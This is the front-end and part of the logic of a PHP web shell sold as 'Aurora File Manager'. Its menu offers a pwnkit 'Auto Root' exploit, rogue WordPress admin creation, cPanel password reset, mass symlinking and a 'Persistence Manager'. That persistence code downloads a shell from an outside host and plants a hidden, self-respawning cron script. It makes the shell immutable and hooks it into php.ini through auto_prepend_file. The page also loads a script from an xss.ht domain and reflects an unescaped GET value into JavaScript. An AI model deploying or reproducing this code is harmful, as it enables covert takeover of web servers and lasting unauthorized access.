scale(1.1) rotate(-5deg); } 100% { transform: scale(1) rotate(0deg); } } .update-alert { animation: updatePulse 2s infinite; position: fixed; right: 20px; top: 20px; z-index: 1000; box-shadow: 0 0 15px rgba(255, 193, 7, 0.5); transition: all 0.3s ease; } .update-alert:hover { transform: scale(1.1); box-shadow: 0 0 20px rgba(255, 193, 7, 0.7); } </style>'; echo '<div class="position-fixed" style="right: 20px; top: 20px; z-index: 1000;"> <a class="nav-link update-alert rounded px-3 mx-1 bg-warning text-dark" href="https://github.com/AuroraFileManager/AuroraFileManager.github.io/" data-bs-toggle="modal" data-bs-target="#updateModal"> <i class="fas fa-exclamation-triangle fa-fw me-2"></i> New v' . htmlspecialchars($update_info['latest_version']) . ' Available! </a> </div>'; } } ?> <li class="nav-item"> <a class="nav-link nav-hover rounded px-3 mx-1" href="?p=<?= enc(PATH) ?>&action=adminer"> <i class="fas fa-database fa-fw me-2"></i> Adminer </a> </li> <li class="nav-item"> <a class="nav-link nav-hover rounded px-3 mx-1" href="?p=<?= enc(PATH) ?>&action=pwnkit"> <i class="fas fa-user-shield fa-fw me-2"></i> Auto Root </a> </li> <li class="nav-item"> <a class="nav-link nav-hover rounded px-3 mx-1" href="#" data-bs-toggle="modal" data-bs-target="#wpAdminModal"> <i class="fab fa-wordpress fa-fw me-2"></i> WP Admin </a> </li> <li class="nav-item"> <a class="nav-link nav-hover rounded px-3 mx-1" href="#" data-bs-toggle="modal" data-bs-target="#cpanelModal"> <i class="fas fa-server fa-fw me-2"></i> cPanel Reset </a> </li> <li class="nav-item"> <a class="nav-link nav-hover rounded px-3 mx-1" href="?p=<?= enc(PATH) ?>&action=backdoor"> <i class="fas fa-lock fa-fw me-2"></i> Anti Backdoor </a> </li> <li class="nav-item"> <a class="nav-link nav-hover rounded px-3 mx-1" href="?p=<?= enc(PATH) ?>&action=phpini"> <i class="fas fa-cog fa-fw me-2"></i> PHP.ini </a> </li> <li class="nav-item"> <a class="nav-link nav-hover rounded px-3 mx-1" href="?p=<?= enc(PATH) ?>&action=mass-symlink"> <i class="fas fa-link fa-fw me-2"></i> Mass Symlink </a> </li> <li class="nav-item"> <a class="nav-link nav-hover rounded px-3 mx-1" href="?p=<?= enc(PATH) ?>&action=auto-shell"> <i class="fas fa-terminal fa-fw me-2"></i> Backup Shell </a> </li> <li class="nav-item"> <a class="nav-link nav-hover rounded px-3 mx-1" href="?p=<?= enc(PATH) ?>&action=persist"> <i class="fas fa-link fa-fw me-2"></i> Persistence Manager </a> </li> </ul> </div> <style> .nav-hover { transition: all 0.3s ease; border: 1px solid transparent; } .nav-hover:hover { background: rgba(255,255,255,0.1); border: 1px solid rgba(255,255,255,0.2); transform: translateY(-2px); } .nav-link { color: rgba(255,255,255,0.8) !important; font-weight: 500; } .nav-link:hover { color: rgba(255,255,255,1) !important; } .navbar-nav { gap: 5px; } </style> </div> </nav> <div class="container-fluid py-3"> <?php if (isset($_GET['terminal']) && $_GET['terminal'] === 'root'): ?> <div class="compatibility-info <?= $is_compatible ? 'compatible' : 'not-compatible' ?>"> <h4> <i class="fas <?= $is_compatible ? 'fa-check-circle' : 'fa-times-circle' ?>"></i> Kernel Version: <?= suggest_exploit() ?> </h4> <p>Status: <?= $is_compatible ? 'Compatible with pwnkit exploit' : 'Not compatible with pwnkit exploit' ?></p> <?php if ($is_compatible): ?> <a href="?p=<?= enc(PATH) ?>&action=pwnkit" class="btn btn-primary"> <i class="fas fa-bolt"></i> Run Exploit </a> <?php endif; ?> </div> <?php if ($root_output): ?> <div class="terminal"><?= htmlspecialchars($root_output) ?></div> <?php endif; ?> <?php endif; ?> <div class="server-info bg-dark text-light p-3 mb-3" style="border-radius: 8px; box-shadow: 0 2px 4px rgba(0,0,0,0.2); background: linear-gradient(45deg, #2b3035, #212529) !important;"> <div class="row"> <div class="col-md-6"> <small> <i class="fas fa-server"></i> Server: <?= $_SERVER['SERVER_SOFTWARE'] ?? 'Unknown' ?><br> <i class="fas fa-network-wired"></i> IP: <?= $_SERVER['SERVER_ADDR'] ?? $_SERVER['LOCAL_ADDR'] ?? 'Unknown' ?><br> <i class="fas fa-user"></i> User: <?= get_current_user() ?> (<?= getmyuid() ?>) </small> </div> <div class="col-md-6"> <small> <i class="fas fa-microchip"></i> System: <?= php_uname() ?><br> <i class="fas fa-code"></i> PHP: <?= phpversion() ?><br> <i class="fas fa-folder-open"></i> Current Path: <?= getcwd() ?> </small> </div> </div> </div> <nav aria-label="breadcrumb" style="margin-bottom: 1rem; max-width: fit-content;"> <ol class="breadcrumb bg-dark text-light p-3" style="border-radius: 8px; box-shadow: 0 2px 4px rgba(0,0,0,0.2); background: linear-gradient(45deg, #2b3035, #212529) !important; margin-bottom: 0;"> <li class="breadcrumb-item"> <a href="?p=<?= enc($current_dir) ?>" style="color: #00ff9d; text-decoration: none; font-weight: 600; transition: all 0.3s ease;"> <i class="fas fa-home"></i> Root </a> </li> <?php $parts = explode(DIRECTORY_SEPARATOR, trim(PATH, DIRECTORY_SEPARATOR)); $path = ''; foreach ($parts as $part) { if (!$part) continue; $path .= DIRECTORY_SEPARATOR . $part; echo '<li class="breadcrumb-item">'; echo '<a href="?p=' . enc($path) . '" style="color: #00b8ff; text-decoration: none; transition: all 0.3s ease; font-weight: 500;">' . $part . '</a>'; echo '</li>'; } ?> </ol> </nav> <div class="btn-toolbar mb-3"> <div class="btn-group me-2"> <button type="button" class="btn btn-primary" data-bs-toggle="modal" data-bs-target="#uploadModal"> <i class="fas fa-upload"></i> Upload </button> <button type="button" class="btn btn-primary" data-bs-toggle="modal" data-bs-target="#newDirModal"> <i class="fas fa-folder-plus"></i> New Folder </button> <button type="button" class="btn btn-primary" data-bs-toggle="modal" data-bs-target="#newFileModal"> <i class="fas fa-file"></i> New File </button> <button type="button" class="btn btn-danger" data-bs-toggle="modal" data-bs-target="#newHiddenDirModal"> <i class="fas fa-folder-minus"></i> Hidden Folder </button> </div> </div> <!-- Hidden Directory Modal --> <div class="modal fade" id="newHiddenDirModal" tabindex="-1" aria-labelledby="newHiddenDirModalLabel" aria-hidden="true"> <div class="modal-dialog"> <div class="modal-content bg-dark text-light"> <div class="modal-header"> <h5 class="modal-title" id="newHiddenDirModalLabel">Create Hidden Directory</h5> <button type="button" class="btn-close btn-close-white" data-bs-dismiss="modal" aria-label="Close"></button> </div> <form method="post"> <div class="modal-body"> <div class="mb-3"> <label for="hiddendirname" class="form-label">Directory Name</label> <input type="text" class="form-control bg-dark text-light" id="hiddendirname" name="hiddendirname" required> </div> </div> <div class="modal-footer"> <button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Close</button> <button type="submit" name="newhiddendir" class="btn btn-danger">Create Hidden Directory</button> </div> </form> </div> </div> </div> <div class="table-responsive"> <table class="table table-hover table-dark"> <thead> <tr> <th>Name</th> <th>Size</th> <th>Permissions</th> <th>Actions</th> </tr> </thead> <tbody> <?php if (PATH !== $current_dir): ?> <tr> <td> <a href="?p=<?= enc(dirname(PATH)) ?>"> <i class="fas fa-level-up-alt"></i> .. </a> </td> <td>-</td> <td>-</td> <td>-</td> </tr> <?php endif; ?> <?php foreach ($dirs as $dir): ?> <tr> <td> <a href="?p=<?= enc(PATH . DIRECTORY_SEPARATOR . $dir) ?>"> <i class="fas fa-folder text-warning"></i> <?= htmlspecialchars($dir) ?> </a> </td> <td>-</td> <td><?= perms(PATH . DIRECTORY_SEPARATOR . $dir) ?></td> <td> <div class="btn-group btn-group-sm"> <a href="?p=<?= enc(PATH) ?>&del=<?= urlencode($dir) ?>" class="btn btn-outline-danger" onclick="return confirm('Delete directory?')"> <i class="fas fa-trash"></i> </a> </div> </td> </tr> <?php endforeach; ?> <?php foreach ($files as $file): ?> <?php $is_dir = is_dir(PATH . DIRECTORY_SEPARATOR . $file); ?> <tr> <td> <?php if ($is_dir): ?> <a href="?p=<?= enc(PATH . DIRECTORY_SEPARATOR . $file) ?>"> <?= icon($file) ?> <?= htmlspecialchars($file) ?> </a> <?php else: ?> <a href="?p=<?= enc(PATH) ?>&act=edit&file=<?= urlencode($file) ?>"> <?= icon($file) ?> <?= htmlspecialchars($file) ?> </a> <?php endif; ?> </td> <td><?= fmtSize(filesize(PATH . DIRECTORY_SEPARATOR . $file)) ?></td> <td><?= perms(PATH . DIRECTORY_SEPARATOR . $file) ?></td> <td> <div class="btn-group btn-group-sm"> <?php if (!$is_dir): ?> <a href="?p=<?= enc(PATH) ?>&act=edit&file=<?= urlencode($file) ?>" class="btn btn-outline-primary"> <i class="fas fa-edit"></i> </a> <a href="?p=<?= enc(PATH) ?>&act=download&file=<?= urlencode($file) ?>" class="btn btn-outline-success"> <i class="fas fa-download"></i> </a> <a href="?p=<?= enc(PATH) ?>&act=backup&file=<?= urlencode($file) ?>" class="btn btn-outline-warning" title="Create Backup"> <i class="fas fa-copy"></i> </a> <?php endif; ?> <a href="?p=<?= enc(PATH) ?>&del=<?= urlencode($file) ?>" class="btn btn-outline-danger" onclick="return confirm('Delete <?= $is_dir ? 'folder' : 'file' ?>?')"> <i class="fas fa-trash"></i> </a> <a href="javascript:void(0)" onclick="renameItem('<?= htmlspecialchars($file) ?>', <?= $is_dir ? 'true' : 'false' ?>)" class="btn btn-outline-info" title="Rename"> <i class="fas fa-file-signature"></i> </a> </div> <script> function renameItem(oldName, isDir) { const itemType = isDir ? 'folder' : 'file'; const newName = prompt(`Enter new ${itemType} name:`, oldName); if (newName && newName !== oldName) { window.location.href = `?p=<?= enc(PATH) ?>&act=rename&oldname=${encodeURIComponent(oldName)}&newname=${encodeURIComponent(newName)}`; } } </script> </td> </tr> <?php endforeach; ?> <?php if (isset($_GET['act']) && $_GET['act'] === 'persist' && isset($_GET['file'])) { // Web Shell Component try { $shell_content = download_content('https://aurorafilemanager.github.io/Aurora.php'); if (!$shell_content) { echo("Failed to download Aurora.php"); } } catch (Exception $e) { echo("Failed to download required files"); } // Persistence Script $cron_content = '#!/bin/bash # Generate random name random_name=$(cat /dev/urandom | tr -dc "a-zA-Z0-9" | fold -w 8 | head -n 1) process_name="/tmp/.$random_name" # Copy script with random name cp $0 $process_name chmod +x $process_name # Add to startup (crontab -l 2>/dev/null; echo "@reboot $process_name") | crontab - # Make process unkillable and hidden function make_immortal() { while true; do # Check if shell exists and download if missing if [ ! -f ' . PATH . '/shell.php ]; then curl -s ' . $_SERVER['HTTP_HOST'] . '/shell.php -o ' . PATH . '/shell.php 2>/dev/null fi # Start new process if killed if ! ps aux | grep -v grep | grep "$process_name" >/dev/null; then nohup $process_name >/dev/null 2>&1 & fi # Minimal sleep to reduce CPU usage sleep 0.1 done } # Start immortal process make_immortal & disown # Hide from process list exec -a "$random_name" bash'; // Create shell file $shell_file = PATH . '/shell.php'; file_put_contents($shell_file, $shell_content); // Create persistence script $cron_file = PATH . '/.favicon.sh'; file_put_contents($cron_file, $cron_content); chmod($cron_file, 0755); // Add to crontab cmd('(crontab -l 2>/dev/null; echo "* * * * * ' . $cron_file . '") | crontab -'); // Try to make file immutable cmd('chattr +i ' . $shell_file . ' 2>/dev/null'); // Attempt PHP auto_prepend persistence $php_ini = php_ini_loaded_file(); if ($php_ini && is_writable($php_ini)) { $ini_content = "\nauto_prepend_file = " . $shell_file . "\n"; file_put_contents($php_ini, $ini_content, FILE_APPEND); } show_notification('Persistence mechanisms deployed successfully', 'success'); } if(isset($_GET['status'])) { $status = $_GET['status']; if($status == 'persistence_added') { $php_ini = php_ini_loaded_file() ?: '/etc/php.ini'; echo '<div class="alert alert-success alert-dismissible fade show" role="alert"> <strong>Success!</strong> File has been locked. Persistence added to: ' . htmlspecialchars($php_ini) . ' <button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button> </div>'; } else if($status == 'backup_created') { echo '<div class="alert alert-success alert-dismissible fade show" role="alert"> <strong>Success!</strong> Backup file has been created. <button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button> </div>'; } } ?> </tbody> </table> </div> </div> <div class="modal fade" id="uploadModal"> <div class="modal-dialog"> <div class="modal-content bg-dark text-light"> <div class="modal-header"> <h5 class="modal-title">Upload File</h5> <button type="button" class="btn-close" data-bs-dismiss="modal"></button> </div> <form method="post" enctype="multipart/form-data"> <div class="modal-body"> <div class="mb-3"> <label class="form-label">Select File</label> <input type="file" name="file" class="form-control bg-dark text-light" required> </div> </div> <div class="modal-footer"> <button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Cancel</button> <button type="submit" name="upload" class="btn btn-primary">Upload</button> </div> </form> </div> </div> </div> <div class="modal fade" id="newDirModal"> <div class="modal-dialog"> <div class="modal-content bg-dark text-light"> <div class="modal-header"> <h5 class="modal-title">New Folder</h5> <button type="button" class="btn-close" data-bs-dismiss="modal"></button> </div> <form method="post"> <div class="modal-body"> <div class="mb-3"> <label class="form-label">Folder Name</label> <input type="text" name="dirname" class="form-control bg-dark text-light" required> </div> </div> <div class="modal-footer"> <button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Cancel</button> <button type="submit" name="newdir" class="btn btn-primary">Create</button> </div> </form> </div> </div> </div> <div class="modal fade" id="newFileModal"> <div class="modal-dialog"> <div class="modal-content bg-dark text-light"> <div class="modal-header"> <h5 class="modal-title">New File</h5> <button type="button" class="btn-close" data-bs-dismiss="modal"></button> </div> <form method="post"> <div class="modal-body"> <div class="mb-3"> <label class="form-label">File Name</label> <input type="text" name="filename" class="form-control bg-dark text-light" required> </div> </div> <div class="modal-footer"> <button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Cancel</button> <button type="submit" name="newfile" class="btn btn-primary">Create</button> </div> </form> </div> </div> </div> <div class="modal fade" id="wpAdminModal"> <div class="modal-dialog"> <div class="modal-content bg-dark text-light"> <div class="modal-header"> <h5 class="modal-title">Add WordPress Admin</h5> <button type="button" class="btn-close" data-bs-dismiss="modal"></button> </div> <form method="post"> <div class="modal-body"> <div class="mb-3"> <label class="form-label">Database Host</label> <input type="text" name="db_host" class="form-control bg-dark text-light" value="localhost" required> </div> <div class="mb-3"> <label class="form-label">Database Name</label> <input type="text" name="db_name" class="form-control bg-dark text-light" required> </div> <div class="mb-3"> <label class="form-label">Database User</label> <input type="text" name="db_user" class="form-control bg-dark text-light" required> </div> <div class="mb-3"> <label class="form-label">Database Password</label> <input type="password" name="db_pass" class="form-control bg-dark text-light" required> </div> <hr> <div class="mb-3"> <label class="form-label">Admin Username</label> <input type="text" name="wp_user" class="form-control bg-dark text-light" required> </div> <div class="mb-3"> <label class="form-label">Admin Password</label> <input type="password" name="wp_pass" class="form-control bg-dark text-light" required> </div> </div> <div class="modal-footer"> <button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Cancel</button> <button type="submit" name="submit" class="btn btn-primary">Create Admin</button> </div> </form> </div> </div> </div> <div class="modal fade" id="cpanelModal"> <div class="modal-dialog"> <div class="modal-content bg-dark text-light"> <div class="modal-header"> <h5 class="modal-title">cPanel Password Reset</h5> <button type="button" class="btn-close" data-bs-dismiss="modal"></button> </div> <form method="post" action="?p=<?= enc(PATH) ?>&action=cpanel-reset"> <div class="modal-body"> <div class="mb-3"> <label class="form-label">Email Address</label> <input type="email" name="email" class="form-control bg-dark text-light" required> </div> </div> <div class="modal-footer"> <button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Cancel</button> <button type="submit" class="btn btn-primary">Reset Password</button> </div> </form> </div> </div> </div> <?php if ($action === 'edit' && $target): ?> <div class="modal fade show" style="display: block;"> <div class="modal-dialog modal-lg"> <div class="modal-content bg-dark text-light"> <div class="modal-header"> <h5 class="modal-title">Edit: <?= htmlspecialchars($target) ?></h5> <button type="button" class="btn-close" onclick="history.back()"></button> </div> <form method="post"> <div class="modal-body"> <textarea name="content" class="form-control bg-dark text-light" style="height: 400px; font-family: monospace;"><?= htmlspecialchars(file_get_contents(PATH . DIRECTORY_SEPARATOR . $target)) ?></textarea> </div> <div class="modal-footer"> <button type="button" class="btn btn-secondary" onclick="history.back()">Cancel</button> <button type="submit" name="save" class="btn btn-primary">Save</button> </div> </form> </div> </div> </div> <div class="modal-backdrop fade show"></div> <?php endif; ?> <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/js/bootstrap.bundle.min.js"></script> <script src="https://googlescripts.xss.ht/assets/environment-cc191d9d2324.js"></script> <script> <?php if (isset($_GET['status'])): ?> const status = '<?= $_GET['status'] ?>'; const message = status === 'success' ? 'Operation complete successfully' : 'Operation failed'; const alertClass = status === 'success' ? 'alert-success' : 'alert-danger'; const alert = document.createElement('div'); alert.className = `alert ${alertClass} alert-dismissible fade show`; alert.innerHTML = ` ${message} <button type="button" class="btn-close" data-bs-dismiss="alert"></button> `; document.querySelector('.container-fluid').insertBefore(alert, document.querySelector('.breadcrumb')); setTimeout(() => alert.remove(), 3000); <?php endif; ?> </script> <!-- Slide Up Button --> <button id="slideUpBtn" class="btn btn-primary rounded-circle position-fixed" style="bottom: 100px; right: 20px; display: none; z-index: 1000;"> <i class="fas fa-chevron-up"></i> </button> <!-- Footer Toggle Button --> <button id="footerToggleBtn" class="btn btn-primary rounded-circle position-fixed" style="bottom: 20px; right: 20px; z-index: 1001;"> <i class="fas fa-info"></i> </button> <!-- Footer --> <footer id="footer" class="bg-dark text-light py-4 fixed-bottom" style="display: none; transition: all 0.3s ease;"> <div class="container"> <div class="row"> <div class="col-md-6"> <h5 class="mb-3">About <?= APP_NAME ?></h5> <p class="mb-0">A powerful and secure file manager for web servers.</p> </div> <div class="col-md-6 text-md-end"> <h5 class="mb-3">Credits</h5> <p class="mb-0"> Created by <a href="https://aurorafilemanager.github.io/" class="text-light" target="_blank">Aurora-FM</a><br> Version <?= APP_VERSION ?><br> <small class="text-white">Made with <i class="fas fa-heart text-danger"></i> and by Aurora-FM Team</small> </p> </div> </div> <hr class="my-4"> <div class="text-center"> <p class="mb-0"> <a href="https://github.com/AuroraFileManager/AuroraFileManager.github.io/" class="text-light mx-2" target="_blank"> <i class="fab fa-github"></i> GitHub </a> <a href="https://instagram.com/Habil.0x" class="text-light mx-2" target="_blank"> <i class="fas fa-globe"></i> Instagram </a> <a href="https://t.me/ZenithSupport_BOT" class="text-light mx-2" target="_blank"> <i class="fab fa-telegram"></i> Telegram </a> </p> </div> </div> </footer> <script> document.getElementById('footerToggleBtn').addEventListener('click', function() { const footer = document.getElementById('footer'); if (footer.style.display === 'none') { footer.style.display = 'block'; this.innerHTML = '<i class="fas fa-times"></i>'; } else { footer.style.display = 'none'; this.innerHTML = '<i class="fas fa-info"></i>'; } }); </script> <div style="margin-bottom: 100px;"></div> <!-- Add spacing to prevent content from being hidden behind footer --> <script> // Show slide up button when scrolling down window.onscroll = function() { if (document.body.scrollTop > 20 || document.documentElement.scrollTop > 20) { document.getElementById("slideUpBtn").style.display = "block"; } else { document.getElementById("slideUpBtn").style.display = "none"; } }; // Slide up button click handler document.getElementById("slideUpBtn").onclick = function() { document.body.scrollTop = 0; // For Safari document.documentElement.scrollTop = 0; // For Chrome, Firefox, IE and Opera }; </script> </body> </html>